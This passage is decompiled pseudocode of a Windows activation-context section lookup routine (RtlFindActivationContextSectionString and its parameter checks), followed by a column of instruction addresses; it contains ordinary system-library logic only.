                                                                                                                                                                            								if(_t130 != 0) {
                                                                                                                                                                            									goto L5;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L6;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t130 == 0) {
                                                                                                                                                                            									goto L83;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									L5:
                                                                                                                                                                            									if( *_t130 < 0x24) {
                                                                                                                                                                            										goto L83;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										L6:
                                                                                                                                                                            										if((_t213 & 0x00000002) == 0) {
                                                                                                                                                                            											L9:
                                                                                                                                                                            											if((_t213 & 0x00000004) != 0) {
                                                                                                                                                                            												if(_t130 + 0x40 <=  *_t130 + _t130) {
                                                                                                                                                                            													goto L10;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_push(0xc000000d);
                                                                                                                                                                            													_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                            													_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                            													goto L82;
                                                                                                                                                                            												}
                                                                                                                                                                            											} else {
                                                                                                                                                                            												L10:
                                                                                                                                                                            												_t233 = _a8;
                                                                                                                                                                            												_v24 = _t213;
                                                                                                                                                                            												_t214 =  *[fs:0x18];
                                                                                                                                                                            												_v16 = _a12;
                                                                                                                                                                            												_v12 = 0;
                                                                                                                                                                            												_t172 = _v12;
                                                                                                                                                                            												_t181 =  *((intOrPtr*)(_t214 + 0x30));
                                                                                                                                                                            												_v28 = 0x18;
                                                                                                                                                                            												_v8 = 0;
                                                                                                                                                                            												_v20 = _a8;
                                                                                                                                                                            												_v60 = 0;
                                                                                                                                                                            												_v52 = _t214;
                                                                                                                                                                            												_v44 = _t181;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													_t135 = _t172;
                                                                                                                                                                            													if(_t135 != 0) {
                                                                                                                                                                            														goto L34;
                                                                                                                                                                            													}
                                                                                                                                                                            													_t164 =  *((intOrPtr*)(_t214 + 0x1a8));
                                                                                                                                                                            													if(_t164 == 0) {
                                                                                                                                                                            														L14:
                                                                                                                                                                            														_t228 =  *((intOrPtr*)(_t181 + 0x1f8));
                                                                                                                                                                            														_v60 = 0;
                                                                                                                                                                            														if(_t228 == 0) {
                                                                                                                                                                            															L36:
                                                                                                                                                                            															_t228 =  *((intOrPtr*)(_t181 + 0x200));
                                                                                                                                                                            															_v60 = 0xfffffffc;
                                                                                                                                                                            															if(_t228 == 0) {
                                                                                                                                                                            																L87:
                                                                                                                                                                            																if(_t172 <= 3) {
                                                                                                                                                                            																	goto L16;
                                                                                                                                                                            																} else {
                                                                                                                                                                            																	_t129 = 0xc00000e5;
                                                                                                                                                                            																	goto L90;
                                                                                                                                                                            																}
                                                                                                                                                                            															} else {
                                                                                                                                                                            																_t172 = 3;
                                                                                                                                                                            																_v12 = 3;
                                                                                                                                                                            																goto L16;
                                                                                                                                                                            															}
                                                                                                                                                                            														} else {
                                                                                                                                                                            															_t172 = 2;
                                                                                                                                                                            															_v12 = 2;
                                                                                                                                                                            															goto L16;
                                                                                                                                                                            														}
                                                                                                                                                                            													} else {
                                                                                                                                                                            														_t165 =  *_t164;
                                                                                                                                                                            														if(_t165 != 0) {
                                                                                                                                                                            															_t166 =  *((intOrPtr*)(_t165 + 4));
                                                                                                                                                                            															_v60 = _t166;
                                                                                                                                                                            															if(_t166 != 0) {
                                                                                                                                                                            																if(_t166 == 0xfffffffc) {
                                                                                                                                                                            																	_t228 =  *((intOrPtr*)(_t181 + 0x200));
                                                                                                                                                                            																	goto L56;
                                                                                                                                                                            																} else {
                                                                                                                                                                            																	if(_t166 == 0xfffffffd) {
                                                                                                                                                                            																		_t228 = "Actx ";
                                                                                                                                                                            																		goto L57;
                                                                                                                                                                            																	} else {
                                                                                                                                                                            																		_t228 =  *((intOrPtr*)(_t166 + 0x10));
                                                                                                                                                                            																		goto L56;
                                                                                                                                                                            																	}
                                                                                                                                                                            																}
                                                                                                                                                                            															} else {
                                                                                                                                                                            																L56:
                                                                                                                                                                            																if(_t228 == 0) {
                                                                                                                                                                            																	goto L14;
                                                                                                                                                                            																} else {
                                                                                                                                                                            																	L57:
                                                                                                                                                                            																	_t172 = 1;
                                                                                                                                                                            																	_v12 = 1;
                                                                                                                                                                            																	L16:
                                                                                                                                                                            																	if(_t228 == 0) {
                                                                                                                                                                            																		_t129 = 0xc0150001;
                                                                                                                                                                            																		L90:
                                                                                                                                                                            																		_t234 = 0;
                                                                                                                                                                            																		goto L91;
                                                                                                                                                                            																	} else {
                                                                                                                                                                            																		_t129 = E1D83A600(_t228, _t233, _a12,  &_v56,  &_v48);
                                                                                                                                                                            																		if(_t129 < 0) {
                                                                                                                                                                            																			_t234 = 0;
                                                                                                                                                                            																			if(_t129 != 0xc0150001 || _t172 == 3) {
                                                                                                                                                                            																				goto L19;
                                                                                                                                                                            																			} else {
                                                                                                                                                                            																				_t181 = _v44;
                                                                                                                                                                            																				_t214 = _v52;
                                                                                                                                                                            																				_t233 = _a8;
                                                                                                                                                                            																				continue;
                                                                                                                                                                            																			}
                                                                                                                                                                            																		} else {
                                                                                                                                                                            																			_t224 = _v60;
                                                                                                                                                                            																			_v8 = (0 | _t224 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t224 == 0x00000000;
                                                                                                                                                                            																			asm("sbb esi, esi");
                                                                                                                                                                            																			_t234 =  ~(_t224 - 0xfffffffc) & _t224;
                                                                                                                                                                            																			_t129 = 0;
                                                                                                                                                                            																			L19:
                                                                                                                                                                            																			if(_t129 < 0) {
                                                                                                                                                                            																				L91:
                                                                                                                                                                            																				if(_t129 < 0) {
                                                                                                                                                                            																					goto L33;
                                                                                                                                                                            																				} else {
                                                                                                                                                                            																					goto L20;
                                                                                                                                                                            																				}
                                                                                                                                                                            																			} else {
                                                                                                                                                                            																				L20:
                                                                                                                                                                            																				_t173 = _v48;
                                                                                                                                                                            																				if(_t173 < 0x2c) {
                                                                                                                                                                            																					L110:
                                                                                                                                                                            																					_t138 = _v56;
                                                                                                                                                                            																					goto L111;
                                                                                                                                                                            																				} else {
                                                                                                                                                                            																					_t229 = _a20;
                                                                                                                                                                            																					while(1) {
                                                                                                                                                                            																						L22:
                                                                                                                                                                            																						_t138 = _v56;
                                                                                                                                                                            																						if( *_v56 != 0x64487353) {
                                                                                                                                                                            																							break;
                                                                                                                                                                            																						}
                                                                                                                                                                            																						_t242 = _t242 - 8;
                                                                                                                                                                            																						_t129 = E1D83A760(_t138, _t173, _a16, _t229,  &_v36,  &_v40);
                                                                                                                                                                            																						if(_t129 >= 0) {
                                                                                                                                                                            																							_t83 = _t234 - 1; // -1
                                                                                                                                                                            																							if((_t83 | 0x00000007) != 0xffffffff) {
                                                                                                                                                                            																								_t145 =  *((intOrPtr*)(_t234 + 0x14));
                                                                                                                                                                            																								_v40 = _t145;
                                                                                                                                                                            																								if(_t145 != 0 && (( *(_t234 + 0x1c) & 0x00000008) == 0 || ( *(_t234 + 0x3c) & 0x00000008) == 0)) {
                                                                                                                                                                            																									 *((char*)(_t242 + 0xf)) = 0;
                                                                                                                                                                            																									 *0x1d9191e0(3, _t234,  *((intOrPtr*)(_t234 + 0x10)),  *((intOrPtr*)(_t234 + 0x18)), 0, _t242 + 0xf);
                                                                                                                                                                            																									_v40();
                                                                                                                                                                            																									 *(_t234 + 0x1c) =  *(_t234 + 0x1c) | 0x00000008;
                                                                                                                                                                            																									if( *((char*)(_t242 + 0xf)) != 0) {
                                                                                                                                                                            																										 *(_t234 + 0x3c) =  *(_t234 + 0x3c) | 0x00000008;
                                                                                                                                                                            																									}
                                                                                                                                                                            																								}
                                                                                                                                                                            																							}
                                                                                                                                                                            																							if(_t229 == 0) {
                                                                                                                                                                            																								L67:
                                                                                                                                                                            																								return 0;
                                                                                                                                                                            																							} else {
                                                                                                                                                                            																								_t129 = E1D824428(_a4, _t229, _t234,  &_v36, _v64,  *((intOrPtr*)(_v64 + 0x24)),  *((intOrPtr*)(_v64 + 0x28)), _t173);
                                                                                                                                                                            																								if(_t129 < 0) {
                                                                                                                                                                            																									goto L33;
                                                                                                                                                                            																								} else {
                                                                                                                                                                            																									goto L67;
                                                                                                                                                                            																								}
                                                                                                                                                                            																							}
                                                                                                                                                                            																						} else {
                                                                                                                                                                            																							if(_t129 != 0xc0150008) {
                                                                                                                                                                            																								L33:
                                                                                                                                                                            																								return _t129;
                                                                                                                                                                            																							} else {
                                                                                                                                                                            																								_t217 =  *[fs:0x18];
                                                                                                                                                                            																								_t234 = 0;
                                                                                                                                                                            																								_v68 = 0;
                                                                                                                                                                            																								_v40 = _t217;
                                                                                                                                                                            																								_v60 = 0;
                                                                                                                                                                            																								_v52 =  *((intOrPtr*)(_t217 + 0x30));
                                                                                                                                                                            																								_t176 = _v20;
                                                                                                                                                                            																								L26:
                                                                                                                                                                            																								while(1) {
                                                                                                                                                                            																									if(_t176 <= 2) {
                                                                                                                                                                            																										_t190 = _t176 - _t234;
                                                                                                                                                                            																										if(_t190 == 0) {
                                                                                                                                                                            																											_t191 =  *((intOrPtr*)(_t217 + 0x1a8));
                                                                                                                                                                            																											if(_t191 == 0) {
                                                                                                                                                                            																												goto L68;
                                                                                                                                                                            																											} else {
                                                                                                                                                                            																												_t201 =  *_t191;
                                                                                                                                                                            																												if(_t201 == 0) {
                                                                                                                                                                            																													goto L68;
                                                                                                                                                                            																												} else {
                                                                                                                                                                            																													_t202 =  *((intOrPtr*)(_t201 + 4));
                                                                                                                                                                            																													_v60 = _t202;
                                                                                                                                                                            																													if(_t202 == 0) {
                                                                                                                                                                            																														L102:
                                                                                                                                                                            																														if(_t151 == 0) {
                                                                                                                                                                            																															goto L68;
                                                                                                                                                                            																														} else {
                                                                                                                                                                            																															goto L103;
                                                                                                                                                                            																														}
                                                                                                                                                                            																													} else {
                                                                                                                                                                            																														if(_t202 != 0xfffffffc) {
                                                                                                                                                                            																															if(_t202 != 0xfffffffd) {
                                                                                                                                                                            																																_t151 =  *((intOrPtr*)(_t202 + 0x10));
                                                                                                                                                                            																																goto L101;
                                                                                                                                                                            																															} else {
                                                                                                                                                                            																																_t151 = "Actx ";
                                                                                                                                                                            																																_v68 = _t151;
                                                                                                                                                                            																																L103:
                                                                                                                                                                            																																_t176 = 1;
                                                                                                                                                                            																																_v20 = 1;
                                                                                                                                                                            																																goto L28;
                                                                                                                                                                            																															}
                                                                                                                                                                            																														} else {
                                                                                                                                                                            																															_t151 =  *((intOrPtr*)(_v52 + 0x200));
                                                                                                                                                                            																															L101:
                                                                                                                                                                            																															_v68 = _t151;
                                                                                                                                                                            																															goto L102;
                                                                                                                                                                            																														}
                                                                                                                                                                            																													}
                                                                                                                                                                            																												}
                                                                                                                                                                            																											}
                                                                                                                                                                            																										} else {
                                                                                                                                                                            																											_t203 = _t190 - 1;
                                                                                                                                                                            																											if(_t203 == 0) {
                                                                                                                                                                            																												L68:
                                                                                                                                                                            																												_v60 = 0;
                                                                                                                                                                            																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
                                                                                                                                                                            																												_v68 = _t151;
                                                                                                                                                                            																												if(_t151 == 0) {
                                                                                                                                                                            																													goto L44;
                                                                                                                                                                            																												} else {
                                                                                                                                                                            																													_t176 = 2;
                                                                                                                                                                            																													_v20 = 2;
                                                                                                                                                                            																													goto L28;
                                                                                                                                                                            																												}
                                                                                                                                                                            																											} else {
                                                                                                                                                                            																												if(_t203 != 1) {
                                                                                                                                                                            																													goto L27;
                                                                                                                                                                            																												} else {
                                                                                                                                                                            																													L44:
                                                                                                                                                                            																													_v60 = 0xfffffffc;
                                                                                                                                                                            																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
                                                                                                                                                                            																													_v68 = _t151;
                                                                                                                                                                            																													if(_t151 == 0) {
                                                                                                                                                                            																														goto L27;
                                                                                                                                                                            																													} else {
                                                                                                                                                                            																														_t176 = 3;
                                                                                                                                                                            																														_v20 = 3;
                                                                                                                                                                            																														goto L28;
                                                                                                                                                                            																													}
                                                                                                                                                                            																												}
                                                                                                                                                                            																											}
                                                                                                                                                                            																										}
                                                                                                                                                                            																									} else {
                                                                                                                                                                            																										L27:
                                                                                                                                                                            																										if(_t176 > 3) {
                                                                                                                                                                            																											_t129 = 0xc00000e5;
                                                                                                                                                                            																											goto L30;
                                                                                                                                                                            																										} else {
                                                                                                                                                                            																											L28:
                                                                                                                                                                            																											if(_t151 != 0) {
                                                                                                                                                                            																												_t129 = E1D83A600(_t151, _a8, _a12,  &_v64,  &_v56);
                                                                                                                                                                            																												if(_t129 < 0) {
                                                                                                                                                                            																													_t219 = 0;
                                                                                                                                                                            																													if(_t129 != 0xc0150001 || _t176 == 3) {
                                                                                                                                                                            																														goto L48;
                                                                                                                                                                            																													} else {
                                                                                                                                                                            																														_t151 = _v68;
                                                                                                                                                                            																														_t217 = _v40;
                                                                                                                                                                            																														continue;
                                                                                                                                                                            																													}
                                                                                                                                                                            																												} else {
                                                                                                                                                                            																													_t177 = _v60;
                                                                                                                                                                            																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
                                                                                                                                                                            																													asm("sbb edx, edx");
                                                                                                                                                                            																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
                                                                                                                                                                            																													_t129 = 0;
                                                                                                                                                                            																													L48:
                                                                                                                                                                            																													if(_t129 < 0) {
                                                                                                                                                                            																														goto L31;
                                                                                                                                                                            																													} else {
                                                                                                                                                                            																														if(_t219 != 0) {
                                                                                                                                                                            																															_t125 = _t219 - 1; // -1
                                                                                                                                                                            																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
                                                                                                                                                                            																																while(1) {
                                                                                                                                                                            																																	_t236 =  *_t219;
                                                                                                                                                                            																																	if(_t236 == 0x7fffffff) {
                                                                                                                                                                            																																		goto L50;
                                                                                                                                                                            																																	}
                                                                                                                                                                            																																	asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                            																																	if(_t236 != _t236) {
                                                                                                                                                                            																																		continue;
                                                                                                                                                                            																																	} else {
                                                                                                                                                                            																																		goto L50;
                                                                                                                                                                            																																	}
                                                                                                                                                                            																																	goto L112;
                                                                                                                                                                            																																}
                                                                                                                                                                            																															}
                                                                                                                                                                            																														}
                                                                                                                                                                            																														L50:
                                                                                                                                                                            																														_t234 = _t219;
                                                                                                                                                                            																														goto L51;
                                                                                                                                                                            																													}
                                                                                                                                                                            																												}
                                                                                                                                                                            																											} else {
                                                                                                                                                                            																												_t129 = 0xc0150001;
                                                                                                                                                                            																												L30:
                                                                                                                                                                            																												if(_t129 >= 0) {
                                                                                                                                                                            																													L51:
                                                                                                                                                                            																													_t173 = _v56;
                                                                                                                                                                            																													if(_t173 >= 0x2c) {
                                                                                                                                                                            																														goto L22;
                                                                                                                                                                            																													} else {
                                                                                                                                                                            																														goto L110;
                                                                                                                                                                            																													}
                                                                                                                                                                            																												} else {
                                                                                                                                                                            																													L31:
                                                                                                                                                                            																													if(_t129 == 0xc0150001) {
                                                                                                                                                                            																														_t129 = 0xc0150008;
                                                                                                                                                                            																													}
                                                                                                                                                                            																													goto L33;
                                                                                                                                                                            																												}
                                                                                                                                                                            																											}
                                                                                                                                                                            																										}
                                                                                                                                                                            																									}
                                                                                                                                                                            																									goto L112;
                                                                                                                                                                            																								}
                                                                                                                                                                            																							}
                                                                                                                                                                            																						}
                                                                                                                                                                            																						goto L112;
                                                                                                                                                                            																					}
                                                                                                                                                                            																					L111:
                                                                                                                                                                            																					_push(_t173);
                                                                                                                                                                            																					E1D8AEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
                                                                                                                                                                            																					_t129 = 0xc0150003;
                                                                                                                                                                            																					goto L33;
                                                                                                                                                                            																				}
                                                                                                                                                                            																			}
                                                                                                                                                                            																		}
                                                                                                                                                                            																	}
                                                                                                                                                                            																}
                                                                                                                                                                            															}
                                                                                                                                                                            														} else {
                                                                                                                                                                            															goto L14;
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            													goto L112;
                                                                                                                                                                            													L34:
                                                                                                                                                                            													_t136 = _t135 - 1;
                                                                                                                                                                            													if(_t136 == 0) {
                                                                                                                                                                            														goto L14;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														if(_t136 != 1) {
                                                                                                                                                                            															goto L87;
                                                                                                                                                                            														} else {
                                                                                                                                                                            															goto L36;
                                                                                                                                                                            														}
                                                                                                                                                                            													}
                                                                                                                                                                            													goto L112;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t130 + 0x2c >  *_t130 + _t130) {
                                                                                                                                                                            												_push(0xc000000d);
                                                                                                                                                                            												_push("RtlpFindActivationContextSection_CheckParameters");
                                                                                                                                                                            												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
                                                                                                                                                                            												L82:
                                                                                                                                                                            												_push(0);
                                                                                                                                                                            												_push(0x33);
                                                                                                                                                                            												E1D8AEF10();
                                                                                                                                                                            												goto L83;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t130 = _a20;
                                                                                                                                                                            												goto L9;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				L112:
                                                                                                                                                                            			}


























































                                                                                                                                                                            0x1d83a178
                                                                                                                                                                            0x1d83a17f
                                                                                                                                                                            0x1d83a182
                                                                                                                                                                            0x1d83a18f
                                                                                                                                                                            0x1d83a4b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8877ce
                                                                                                                                                                            0x1d8877ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8877ce
                                                                                                                                                                            0x1d83a195
                                                                                                                                                                            0x1d83a195
                                                                                                                                                                            0x1d83a199
                                                                                                                                                                            0x1d83a1a1
                                                                                                                                                                            0x1d83a1a9
                                                                                                                                                                            0x1d83a1b1
                                                                                                                                                                            0x1d8877f3
                                                                                                                                                                            0x1d8877f3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a1b7
                                                                                                                                                                            0x1d83a1b7
                                                                                                                                                                            0x1d83a1c0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a1c6
                                                                                                                                                                            0x1d83a1c6
                                                                                                                                                                            0x1d83a1cc
                                                                                                                                                                            0x1d83a5dc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a5e2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a5e2
                                                                                                                                                                            0x1d83a1d2
                                                                                                                                                                            0x1d83a1d4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a1da
                                                                                                                                                                            0x1d83a1da
                                                                                                                                                                            0x1d83a1dd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a1e3
                                                                                                                                                                            0x1d83a1e3
                                                                                                                                                                            0x1d83a1e6
                                                                                                                                                                            0x1d83a1fa
                                                                                                                                                                            0x1d83a1fd
                                                                                                                                                                            0x1d83a5f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a5f6
                                                                                                                                                                            0x1d8877fd
                                                                                                                                                                            0x1d887802
                                                                                                                                                                            0x1d887807
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d887807
                                                                                                                                                                            0x1d83a203
                                                                                                                                                                            0x1d83a203
                                                                                                                                                                            0x1d83a208
                                                                                                                                                                            0x1d83a20b
                                                                                                                                                                            0x1d83a20f
                                                                                                                                                                            0x1d83a216
                                                                                                                                                                            0x1d83a21c
                                                                                                                                                                            0x1d83a224
                                                                                                                                                                            0x1d83a228
                                                                                                                                                                            0x1d83a22b
                                                                                                                                                                            0x1d83a233
                                                                                                                                                                            0x1d83a23b
                                                                                                                                                                            0x1d83a23f
                                                                                                                                                                            0x1d83a243
                                                                                                                                                                            0x1d83a247
                                                                                                                                                                            0x1d83a250
                                                                                                                                                                            0x1d83a252
                                                                                                                                                                            0x1d83a255
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a25b
                                                                                                                                                                            0x1d83a263
                                                                                                                                                                            0x1d83a26f
                                                                                                                                                                            0x1d83a26f
                                                                                                                                                                            0x1d83a277
                                                                                                                                                                            0x1d83a27d
                                                                                                                                                                            0x1d83a3ae
                                                                                                                                                                            0x1d83a3ae
                                                                                                                                                                            0x1d83a3b4
                                                                                                                                                                            0x1d83a3be
                                                                                                                                                                            0x1d887823
                                                                                                                                                                            0x1d887826
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88782c
                                                                                                                                                                            0x1d88782c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88782c
                                                                                                                                                                            0x1d83a3c4
                                                                                                                                                                            0x1d83a3c4
                                                                                                                                                                            0x1d83a3c9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a3c9
                                                                                                                                                                            0x1d83a283
                                                                                                                                                                            0x1d83a283
                                                                                                                                                                            0x1d83a288
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a288
                                                                                                                                                                            0x1d83a265
                                                                                                                                                                            0x1d83a265
                                                                                                                                                                            0x1d83a269
                                                                                                                                                                            0x1d83a4bf
                                                                                                                                                                            0x1d83a4c2
                                                                                                                                                                            0x1d83a4c8
                                                                                                                                                                            0x1d83a4e3
                                                                                                                                                                            0x1d88780e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a4e9
                                                                                                                                                                            0x1d83a4ec
                                                                                                                                                                            0x1d887819
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a4f2
                                                                                                                                                                            0x1d83a4f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a4f2
                                                                                                                                                                            0x1d83a4ec
                                                                                                                                                                            0x1d83a4ca
                                                                                                                                                                            0x1d83a4ca
                                                                                                                                                                            0x1d83a4cc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a4d2
                                                                                                                                                                            0x1d83a4d2
                                                                                                                                                                            0x1d83a4d2
                                                                                                                                                                            0x1d83a4d7
                                                                                                                                                                            0x1d83a28c
                                                                                                                                                                            0x1d83a28e
                                                                                                                                                                            0x1d887833
                                                                                                                                                                            0x1d887838
                                                                                                                                                                            0x1d887838
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a294
                                                                                                                                                                            0x1d83a2a5
                                                                                                                                                                            0x1d83a2ac
                                                                                                                                                                            0x1d83a3d2
                                                                                                                                                                            0x1d83a3d9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a3e8
                                                                                                                                                                            0x1d83a3e8
                                                                                                                                                                            0x1d83a3ec
                                                                                                                                                                            0x1d83a3f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a3f0
                                                                                                                                                                            0x1d83a2b2
                                                                                                                                                                            0x1d83a2b2
                                                                                                                                                                            0x1d83a2d2
                                                                                                                                                                            0x1d83a2d6
                                                                                                                                                                            0x1d83a2d8
                                                                                                                                                                            0x1d83a2da
                                                                                                                                                                            0x1d83a2dc
                                                                                                                                                                            0x1d83a2de
                                                                                                                                                                            0x1d88783a
                                                                                                                                                                            0x1d88783c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d887842
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d887842
                                                                                                                                                                            0x1d83a2e4
                                                                                                                                                                            0x1d83a2e4
                                                                                                                                                                            0x1d83a2e4
                                                                                                                                                                            0x1d83a2eb
                                                                                                                                                                            0x1d8878ed
                                                                                                                                                                            0x1d8878ed
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a2f1
                                                                                                                                                                            0x1d83a2f1
                                                                                                                                                                            0x1d83a300
                                                                                                                                                                            0x1d83a300
                                                                                                                                                                            0x1d83a300
                                                                                                                                                                            0x1d83a30a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a310
                                                                                                                                                                            0x1d83a325
                                                                                                                                                                            0x1d83a32c
                                                                                                                                                                            0x1d83a4f7
                                                                                                                                                                            0x1d83a500
                                                                                                                                                                            0x1d83a502
                                                                                                                                                                            0x1d83a505
                                                                                                                                                                            0x1d83a50b
                                                                                                                                                                            0x1d83a5a5
                                                                                                                                                                            0x1d83a5b8
                                                                                                                                                                            0x1d83a5be
                                                                                                                                                                            0x1d83a5c2
                                                                                                                                                                            0x1d83a5cb
                                                                                                                                                                            0x1d83a5d1
                                                                                                                                                                            0x1d83a5d1
                                                                                                                                                                            0x1d83a5cb
                                                                                                                                                                            0x1d83a50b
                                                                                                                                                                            0x1d83a523
                                                                                                                                                                            0x1d83a549
                                                                                                                                                                            0x1d83a551
                                                                                                                                                                            0x1d83a525
                                                                                                                                                                            0x1d83a53c
                                                                                                                                                                            0x1d83a543
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a543
                                                                                                                                                                            0x1d83a332
                                                                                                                                                                            0x1d83a337
                                                                                                                                                                            0x1d83a393
                                                                                                                                                                            0x1d83a399
                                                                                                                                                                            0x1d83a339
                                                                                                                                                                            0x1d83a339
                                                                                                                                                                            0x1d83a342
                                                                                                                                                                            0x1d83a344
                                                                                                                                                                            0x1d83a34a
                                                                                                                                                                            0x1d83a34e
                                                                                                                                                                            0x1d83a355
                                                                                                                                                                            0x1d83a359
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a360
                                                                                                                                                                            0x1d83a363
                                                                                                                                                                            0x1d83a3fa
                                                                                                                                                                            0x1d83a3fc
                                                                                                                                                                            0x1d887847
                                                                                                                                                                            0x1d88784f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d887855
                                                                                                                                                                            0x1d887855
                                                                                                                                                                            0x1d887859
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88785f
                                                                                                                                                                            0x1d88785f
                                                                                                                                                                            0x1d887862
                                                                                                                                                                            0x1d887868
                                                                                                                                                                            0x1d887892
                                                                                                                                                                            0x1d887894
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88786a
                                                                                                                                                                            0x1d88786d
                                                                                                                                                                            0x1d88787e
                                                                                                                                                                            0x1d88788b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d887880
                                                                                                                                                                            0x1d887880
                                                                                                                                                                            0x1d887885
                                                                                                                                                                            0x1d88789a
                                                                                                                                                                            0x1d88789a
                                                                                                                                                                            0x1d88789f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88789f
                                                                                                                                                                            0x1d88786f
                                                                                                                                                                            0x1d887873
                                                                                                                                                                            0x1d88788e
                                                                                                                                                                            0x1d88788e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d88788e
                                                                                                                                                                            0x1d88786d
                                                                                                                                                                            0x1d887868
                                                                                                                                                                            0x1d887859
                                                                                                                                                                            0x1d83a402
                                                                                                                                                                            0x1d83a402
                                                                                                                                                                            0x1d83a405
                                                                                                                                                                            0x1d83a554
                                                                                                                                                                            0x1d83a556
                                                                                                                                                                            0x1d83a55e
                                                                                                                                                                            0x1d83a564
                                                                                                                                                                            0x1d83a56a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a570
                                                                                                                                                                            0x1d83a570
                                                                                                                                                                            0x1d83a575
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a575
                                                                                                                                                                            0x1d83a40b
                                                                                                                                                                            0x1d83a40e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a414
                                                                                                                                                                            0x1d83a414
                                                                                                                                                                            0x1d83a418
                                                                                                                                                                            0x1d83a420
                                                                                                                                                                            0x1d83a426
                                                                                                                                                                            0x1d83a42c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a432
                                                                                                                                                                            0x1d83a432
                                                                                                                                                                            0x1d83a437
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a437
                                                                                                                                                                            0x1d83a42c
                                                                                                                                                                            0x1d83a40e
                                                                                                                                                                            0x1d83a405
                                                                                                                                                                            0x1d83a369
                                                                                                                                                                            0x1d83a369
                                                                                                                                                                            0x1d83a36c
                                                                                                                                                                            0x1d8878e3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a372
                                                                                                                                                                            0x1d83a372
                                                                                                                                                                            0x1d83a374
                                                                                                                                                                            0x1d83a452
                                                                                                                                                                            0x1d83a459
                                                                                                                                                                            0x1d83a57e
                                                                                                                                                                            0x1d83a585
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a594
                                                                                                                                                                            0x1d83a594
                                                                                                                                                                            0x1d83a598
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a598
                                                                                                                                                                            0x1d83a45f
                                                                                                                                                                            0x1d83a45f
                                                                                                                                                                            0x1d83a47f
                                                                                                                                                                            0x1d83a483
                                                                                                                                                                            0x1d83a485
                                                                                                                                                                            0x1d83a487
                                                                                                                                                                            0x1d83a489
                                                                                                                                                                            0x1d83a48b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d83a491
                                                                                                                                                                            0x1d83a493
                                                                                                                                                                            0x1d8878a8
